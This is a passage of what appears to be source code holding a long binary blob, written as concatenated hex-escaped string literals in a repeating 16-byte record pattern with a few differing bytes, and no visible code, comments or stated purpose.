+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x7d\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
+"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" 
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\xeb\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\xe0\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" 
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 